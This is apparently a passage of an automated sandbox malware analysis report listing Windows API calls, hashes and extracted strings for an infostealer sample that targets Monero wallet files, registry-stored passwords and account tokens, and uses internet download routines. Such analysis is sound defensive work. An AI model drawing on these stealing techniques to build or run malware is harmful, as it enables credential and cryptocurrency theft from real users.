                            • lstrcat.KERNEL32(00000000,?), ref: 00EC44E5
                            • lstrcat.KERNEL32(00000000,00ED0FB8), ref: 00EC44F4
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 24becaa923ffe6074aa00f383fbb25241ac1071f19fa0363240608ff65d04df5
                            • Instruction ID: 8f3a41dfab38f3c18ec9cc207ef1983626227d7a799e9a4da7287ca282a72436
                            • Opcode Fuzzy Hash: 24becaa923ffe6074aa00f383fbb25241ac1071f19fa0363240608ff65d04df5
                            • Instruction Fuzzy Hash: 0F718AB6900208A7CB14EBA0DD96FEE73B9BB48304F04559CF609A7181DA76DB46CF51
                            APIs
                              • Part of subcall function 00EB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB12B4
                              • Part of subcall function 00EB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB12BB
                              • Part of subcall function 00EB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EB12D7
                              • Part of subcall function 00EB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EB12F5
                              • Part of subcall function 00EB12A0: RegCloseKey.ADVAPI32(?), ref: 00EB12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 00EB134F
                            • lstrlen.KERNEL32(?), ref: 00EB135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00EB1377
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EB1465
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 00EB14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: e4d14756d5f454f7bd68aeda8ddcc029d81a60a958a567d8b4ec6f9ce58f3977
                            • Instruction ID: 2d2b361b6eedf6fd9affd4b152db44cae70b4ec09ec2077eafb4c31d4b9c52bb
                            • Opcode Fuzzy Hash: e4d14756d5f454f7bd68aeda8ddcc029d81a60a958a567d8b4ec6f9ce58f3977
                            • Instruction Fuzzy Hash: F75154B295021C97CB25EB60DD96FED73BCAB50304F4451ACB60A72081EE316B86CBA5
                            APIs
                              • Part of subcall function 00EB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EB733A
                              • Part of subcall function 00EB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EB73B1
                              • Part of subcall function 00EB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EB740D
                              • Part of subcall function 00EB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EB7452
                              • Part of subcall function 00EB72D0: HeapFree.KERNEL32(00000000), ref: 00EB7459
                            • lstrcat.KERNEL32(00000000,00ED17FC), ref: 00EB7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EB7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 00EB765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EB768F
                            • lstrcat.KERNEL32(00000000,00ED1804), ref: 00EB76A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EB76D3
                            • lstrcat.KERNEL32(00000000,00ED1808), ref: 00EB76ED
                            • task.LIBCPMTD ref: 00EB76FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 0356b1a38665087223409de1614eb070904a99e562ff2b824ea581adb343aff5
                            • Instruction ID: bb6cb12fe6e3ee1485a9fb70cd0039e4c26857c32ad486f0499762debedb0222
                            • Opcode Fuzzy Hash: 0356b1a38665087223409de1614eb070904a99e562ff2b824ea581adb343aff5
                            • Instruction Fuzzy Hash: 07314D72A01109DBCB18EBA4D986DEF73B8AB88301F20511CE146B7685DA39A947CB50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A9D950,00000000,?,00ED0E2C,00000000,?,00000000), ref: 00EC8130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC8137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EC8158
                            • __aulldiv.LIBCMT ref: 00EC8172
                            • __aulldiv.LIBCMT ref: 00EC8180
                            • wsprintfA.USER32 ref: 00EC81AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 39a3b53faccda1e7c57659b021975234e0dbfea4bf6991b04f0054842f91d88b
                            • Instruction ID: 7867065bad09f4a682510d70efe2f73f99332048ec48f2c820badce3459c0862
                            • Opcode Fuzzy Hash: 39a3b53faccda1e7c57659b021975234e0dbfea4bf6991b04f0054842f91d88b
                            • Instruction Fuzzy Hash: DA213EB1E44208ABDB10DFD4CE4AFAEB7B8FB44710F10411DF605BB280D77A69028BA5
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                            • InternetOpenA.WININET(00ED0DF7,00000001,00000000,00000000,00000000), ref: 00EB610F
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EB618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EB61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00EB61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EB620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00EB6249
                            • InternetCloseHandle.WININET(?), ref: 00EB6253
                            • InternetCloseHandle.WININET(00000000), ref: 00EB6260
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: ed5048df116d8ba2fcc765f904954d428218747849f83e3e8d0d194ca54e29ed
                            • Instruction ID: c44c9cb2ddb26222cbaa1da4178380fb9a5138921f3d4d6d31c086aba34bf561
                            • Opcode Fuzzy Hash: ed5048df116d8ba2fcc765f904954d428218747849f83e3e8d0d194ca54e29ed
                            • Instruction Fuzzy Hash: E3513EB1A00218ABEB20DF50DD49FEE77B8FB44705F109098A609B71C1DB796A85CF95
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EB733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EB73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EB740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00EB7452
                            • HeapFree.KERNEL32(00000000), ref: 00EB7459
                            • task.LIBCPMTD ref: 00EB7555
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: f19263882837107351292be099df061cdca2a9cdee0628a95fba0b07d761bfbc
                            • Instruction ID: f175061ff1ad31b22543825af2c73b1b3bf6f3804db7dfcf8f089c468bd251ca
                            • Opcode Fuzzy Hash: f19263882837107351292be099df061cdca2a9cdee0628a95fba0b07d761bfbc
                            • Instruction Fuzzy Hash: D1614BB19042589BDB24DF50DD41BDAB7BCBF44344F0091E9E689B6641DBB06BC9CFA0
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            • lstrlen.KERNEL32(00000000), ref: 00EBBC9F
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 00EBBCCD
                            • lstrlen.KERNEL32(00000000), ref: 00EBBDA5
                            • lstrlen.KERNEL32(00000000), ref: 00EBBDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 47395ca61124e23b70b90429b75f8ed1d50389c7e673f240e7fd8b0f4c473cc9
                            • Instruction ID: 0dffc598b5747e125bedb63290e62dfb4ba877f029a7bcfd44e2480cc4b27f28
                            • Opcode Fuzzy Hash: 47395ca61124e23b70b90429b75f8ed1d50389c7e673f240e7fd8b0f4c473cc9
                            • Instruction Fuzzy Hash: 19B1517291010C9BCB18EBA0DE96FEE73B8AF54304F44516DF506B3191EF356A4ACB62
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 2a68ce0eb956bfbf9d1e79805ca938467e902545153d68d186b46d90ad1ea568
                            • Instruction ID: c86869edc3c5faa4c27c32e19545bdfc896befc5674702ca2c0b6af15443a122
                            • Opcode Fuzzy Hash: 2a68ce0eb956bfbf9d1e79805ca938467e902545153d68d186b46d90ad1ea568
                            • Instruction Fuzzy Hash: D1F09A30A04208EFD3509FE0A90AF6C7B70FB04702F04019DE24A97A84D67A5A428BD1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EB4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB4FD1
                            • InternetOpenA.WININET(00ED0DDF,00000000,00000000,00000000,00000000), ref: 00EB4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EB5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EB5041
                            • InternetCloseHandle.WININET(?), ref: 00EB50B9
                            • InternetCloseHandle.WININET(?), ref: 00EB50C6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: f2ecc6c93146eb6746f1666efbd35621c590dae693242f85c92bb920ac43b007
                            • Instruction ID: 61f1c788b06fedcb3da3f48e24bab1519e8948f767b7364ab823a3616486de6d
                            • Opcode Fuzzy Hash: f2ecc6c93146eb6746f1666efbd35621c590dae693242f85c92bb920ac43b007
                            • Instruction Fuzzy Hash: F53104B5A00218EBDB20DF54DC85BDDB7B4FB48704F1081D9EA09B7280D7756E858FA8
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EC8426
                            • wsprintfA.USER32 ref: 00EC8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EC847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC8499
